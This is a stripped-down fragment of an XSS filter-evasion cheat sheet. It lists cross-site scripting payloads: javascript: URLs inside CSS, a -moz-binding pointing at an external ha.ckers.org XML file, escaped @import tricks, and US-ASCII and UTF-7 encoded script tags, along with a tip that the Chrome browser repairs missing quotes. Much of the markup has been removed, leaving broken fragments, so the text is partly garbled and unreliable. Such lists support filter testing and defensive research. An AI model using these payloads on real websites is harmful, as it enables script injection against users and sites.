'';!--"=&{()}

xxs link

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

xxs link
alert("XSS")">

perl -e 'print "";' > out

alert("XSS");//

alert("XSS");

li {list-style-image: url("javascript:alert('XSS')");}XSS

; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';

alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}

¼script¾alert(¢XSS¢)¼/script¾

cript:alert('XSS')">

cript:alert('XSS')">

alert("XSS")'); ?>
alert('XSS')">
 +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-